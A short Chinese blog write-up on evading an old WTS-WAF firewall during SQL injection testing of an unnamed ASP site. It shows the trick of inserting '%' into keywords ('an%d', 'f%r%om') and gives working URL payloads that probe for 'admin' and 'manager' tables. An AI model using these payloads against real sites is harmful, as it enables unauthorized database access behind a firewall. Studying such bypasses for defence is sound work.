天天看點

老版本WTS-WAF bypass小記

起因

挖漏洞的時候總是會遇到​

​WAF​

​,繞過記錄

漏洞點

​***view.asp?big=75&Id=1​

​​ 漏洞點在​

​Id​

​參數

添加單引号報錯

老版本WTS-WAF bypass小記

來一波老套的​

​Id=1 and 1=1 ​

​,出現防火牆

​***view.asp?big=75&Id=1%20and%201=1​

老版本WTS-WAF bypass小記

bypass

老版本​

​WTS-WAF​

​​繞過很簡單,在關鍵字裡面加​

​%​

​符号即可

​***view.asp?big=75&Id=1%20an%d%201=1​

老版本WTS-WAF bypass小記

成功繞過

猜表

猜表名,這個地方使用​

​burpsuite​

​​暴力跑就行,也可以手動測一些比較正常的表名,例如​

​admin​

​***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20admin)​

老版本WTS-WAF bypass小記

說明存在​

​admin​

​​表,為了證明語句沒錯,再測一下​

​manager​

​表

​***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20manager)​

老版本WTS-WAF bypass小記

說明注入語句沒錯,​

​manager​

​表不存在

點到為止

參考連結

  • ​​https://zhuanlan.zhihu.com/p/27730232​​
  • ​​https://www.jianshu.com/p/b2da19279f1f​​